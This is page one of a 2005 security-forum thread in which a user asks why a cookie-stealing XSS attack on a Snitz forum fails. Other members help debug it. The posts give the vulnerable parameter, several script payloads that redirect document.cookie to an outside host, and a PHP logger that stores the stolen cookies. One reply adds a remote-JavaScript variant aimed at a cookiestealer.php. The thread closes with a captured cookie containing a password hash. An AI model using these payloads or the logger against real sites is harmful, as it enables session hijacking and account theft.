Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 896
Members: 0
Total: 896
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> XSS cookie in address bar Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
XSS cookie in address bar
PostPosted: Wed Apr 13, 2005 9:36 am Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




My question is after xss i don't get cookie logged in a file but it is showed in address bar instead.Where do i get wrong,thanks
View user's profile Send private message
Re: XSS cookie in address bar
PostPosted: Wed Apr 13, 2005 10:17 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




oxygenne wrote:
My question is after xss i don't get cookie logged in a file but it is showed in address bar instead.Where do i get wrong,thanks


More details please Smile
View user's profile Send private message Send e-mail Visit poster's website
XSS
PostPosted: Wed Apr 13, 2005 2:50 pm Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




Well its snitz forums and there exists XSS in links_showsub.asp?cat_id=4&cat=XSS

So basicly i inject folowing script
<script>document.location='http://www.host.com/script.php?cookie='+document.cookie;</Script>

where script.php is:
<?php
$fp = fopen('logger.txt','a'); // open to append
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>

Instead of having cookie logged in a logger.txt the cookie is displayed in the address bar.This is the reslut

http://forums.xxx.com/www.host.com/script.php?cookie=Snitz00arrRqCalForumID=1%2C41%2C4%1C18%2C76;%20ASPSESSIONIDCCCAQTBS=

So why is not cookie logged in a logger.txt file
View user's profile Send private message
PostPosted: Wed Apr 13, 2005 4:13 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This logger code seems to be ok. Maybe you don't have write permissions to specific directory?
So, i suggest to add some debug code:

Code:

<?php
$fp = fopen('logger.txt','a'); // open to append
if(!$fp)
{
    die('f**ck, can't open file to write!');
}
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>
View user's profile Send private message Send e-mail Visit poster's website
Still same
PostPosted: Thu Apr 14, 2005 11:05 am Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




Nope the result its still the same maybe this is some kind of http response splitting or...Smile
View user's profile Send private message
PostPosted: Thu Apr 14, 2005 12:27 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You wrote before:

Quote:

the cookie is displayed in the address bar


This is normal, because you have making GET request, so those parameters are as part of the request URI.
But problem still stays - for some reason script is not writing to the file.
Question - if you look at webserver directory after script is worked,
is there empty log file or no log file at all??
And you can add some more debug code, to see, if GET parameters are accessible:

Code:

<?php
$test = $_GET['cookie'];
echo "cookie --> $test\n";

$fp = fopen('logger.txt','a'); // open to append
if(!$fp)
{
    die('f**ck, can't open file to write!');
}
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Apr 14, 2005 12:32 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Wait a minute, seems that i was getting wrong picture Smile
You mean, that script WRITES to log file SOMETHING as:

Code:

Snitz00arrRqCalForumID=1%2C41%2C4%1C18%2C76;%20ASPSESSIONIDCCCAQTBS=


but there is no actual password hash? Am i right?
View user's profile Send private message Send e-mail Visit poster's website
Here it is
PostPosted: Thu Apr 14, 2005 12:41 pm Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




No it doesn't even create logger.txt file the result is shown in the browser as:

http://forums.xxx.com/www.host.com/script.php?cookie=Snitz00arrRqCalForumID=1%2C41%2C4%1C18%2C76;%20ASPSESSIONIDCCCAQTBS=blabla

Once it managed to create the logger.txt file but inside were just this lines: "~~~~~~~~~"

I don't get any kind of error either

Is snitz forum secure as is not shown in your forums vulnerable list
View user's profile Send private message
PostPosted: Thu Apr 14, 2005 2:13 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




try adding a "window", so the script looks like:
Code:

<script>window.document.location='http://www.host.com/script.php?cookie='+window.document.cookie;</Script>


maybe it helps, since web browsers are changed in mean while Rolling Eyes

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu Apr 14, 2005 2:55 pm Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




No help for me:( still the same

Im using url encoder from winfosec but im sure thats not the problem
View user's profile Send private message
PostPosted: Thu Apr 14, 2005 8:13 pm Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




I Think the problem is somewhere in the quote after "cookie=" parametar
<script>document.location='http://www.host.info/cookie.php?cookie='+document.cookie</Script>

after i put it like this
<script>document.location='http://www.host.info/cookie.php?cookie=+document.cookie'</Script>
the file is immediatelly created but without cookie in it
View user's profile Send private message
PostPosted: Thu Apr 14, 2005 10:20 pm Reply with quote
no0bz
Regular user
Regular user
 
Joined: Aug 06, 2004
Posts: 5
Location: cordoba, argentina




ey dude waxup... why dont u try some .js file i did it in that way and cookiestealer.php works pretty cool...
look in da xss put some like this

Code:
<script src="http://whtaeveruwant.com/iwillredirectu.js"></script>



and in da js file just put

Code:
 
window.location='http://usuarios.lycos.es/xinzane/cookiestealer.php?cookie='+document.cookie';


Greetz

_________________
Try me...
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sat Apr 16, 2005 12:43 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




oxygenne wrote:
I Think the problem is somewhere in the quote after "cookie=" parametar
<script>document.location='http://www.host.info/cookie.php?cookie='+document.cookie</Script>

after i put it like this
<script>document.location='http://www.host.info/cookie.php?cookie=+document.cookie'</Script>
the file is immediatelly created but without cookie in it


im curios why this happen, ive already try some kind of cookies stealing script a long time ago n it workz, but when u post the message , i have to try it again Smile

so i use your script Smile

before that i create a file called "logger.txt" with permission 777 in the same directory with cookie.php.

then i run some XSS on vulnerable CMS (i have one) then the command will redirect it to script (cookie.php) my laptop to write the cookies to a file (logger.txt).

n IT workzzz fine

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
cgi script
PostPosted: Sun Apr 17, 2005 3:31 pm Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




Well the only script that managed to log the cookie is based upon this

My cookie = user=zeno; id=021
My script = www.cgisecurity.com/cgi-bin/cookie.cgi

It sends a request to my site that looks like this.

GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space

But the source of cookie.cgi is not given.
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 3:38 pm Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




forgot to mention the responce cookie is on following format

cookie=Snitz00arrRqCalForumID=1%2C41%2C3%2C18%2C84;%20Snitz00User=Pword=md5hash&Name=userid;%20ASPSESSIONIDASRQCSAS=CGGBCJDBBBDGBILOMCNJPCNH;%20ASPSESSIONIDAQRRDTAT=LONAMMDBCAIGDCGLEEKHCGEK
View user's profile Send private message
XSS cookie in address bar
  www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.187 Seconds